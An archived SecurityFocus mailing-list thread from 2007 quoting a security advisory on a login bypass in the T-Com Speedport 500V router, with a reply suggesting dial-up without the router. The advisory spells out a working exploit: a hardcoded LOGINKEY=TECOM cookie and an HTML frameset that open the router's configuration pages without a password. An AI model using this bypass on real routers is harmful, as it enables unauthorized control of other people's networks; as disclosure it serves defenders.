Virginity Security Advisory 2007-001 : T-Com Speedport 500V Login bypass Jan 19 2007 02:58PM
advisory07 smtp ru (1 replies)
Re: Virginity Security Advisory 2007-001 : T-Com Speedport 500V Login bypass Jan 22 2007 12:35PM
security (at) yospot (dot) de [email concealed] (security yospot de)
Since this is not the first security problem on this router, and
Deutsche Telekom really does not care,
I advice everyone to use alternative means of routing / dialing up. The
modem shipped in conjunction with
this router requires VLAN support. Dialup requests will only be served
on VLAN.7

More information can be found on man-wiki, althought it deals with the
700V, which has the same security problems, it also applies to the 500V
version.
<a
href="http://man-wiki.net/index.php/T-Home_IPTV_without_speedport_W_700V
">man-wiki</a>
and
<a
href="http://man-wiki.net/index.php/T-Home_IPTV_over_wireless_bridge">ma
n-wiki</a>

On Linux a "vconfig add eth0 7" will allow you to dial up without the
Speedport 500V

Regards,
<a href="http://www.mohammadkhani.eu/">Amir Mohammadkhani</a>

advisory07 (at) smtp (dot) ru [email concealed] schrieb:
> - - - --------------------------------------------------------------------
> Virginity Security Advisory 2007-001
> - - - --------------------------------------------------------------------
> DATE : 2007-01-19 15:32 GMT
> TYPE : remote
> VERSIONS AFFECTED : T-Com Speedport 500V Firmware 1.31
> AUTHOR : Virginity
> ADVISORY NUMBER : 005
> - - - --------------------------------------------------------------------
>
>
> Description:
>
> The Speedport 500V is a broadband-router which is sold in germany along
> with ADSL lines. (just so you know)
>
> The system is stupid and verifies wether you have entered the correct
> password by setting a cookie with the content LOGINKEY=TECOM
> (this is hardcoded and can not be changed)
> If an attacker simply creates this cookie he can bypass password
> authentication by simply calling the configuration html sites directly.
>
> The attacker then has nearly full system access (you cannot change the
> system password without knowing the old one) and can change system
> configuration e.g. disable the firewall. You can also perform a firmware
> upgrade, which allows you to reset the password to the default one, which
> now gives you full system access.
>
> Vendor has not been notified. I don't think they care^^.
>
> - - - --------------------------------------------------------------------
>
>
> Example:
>
> Create a cookie like this:
>
> Name: LOGINKEY
> Content: TECOM
> Host: <ipaddress> <- replace this by your routers ipaddress ;)
> Path: /
> Expires: Never
>
> create a html page like this and open it in your browser:
>
> <html>
> <frameset rows="44,*" border=0 frameborder=0 framespacing=0">
> <frame src="http://<ipaddress>/b_banner.htm" name="banner">
> <frameset cols="170,*" border=0 frameborder=0 framespacing=0>
> <frame src="http://<ipaddress>/m_startseite.htm" name="menu">
> <frame src="http://<ipaddress>/hcti_startseite.htm" name="hcti">
> </frameset>
> </frameset>
> </html>
>
> this will bypass the login screen and lead you directly to configuration
> menu.
>
> - - - --------------------------------------------------------------------
>
>
> Workaround:
>
> Download the Sourcecode from the vendor (GPL), replace TECOM with something
> else, try bulding it, and then try installing it on the hardware.
> i did not try this. its stupid and does not really solve the problem.
>
> - - - --------------------------------------------------------------------
>
>
> Personal note:
>
> Still here... sadly not dead yet. maybe i should hack the NSA so they kill
> me? *lol* guess i'd have to learn some real things.... greetz to s.
> and that other admin.
>
> - - - --------------------------------------------------------------------
>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus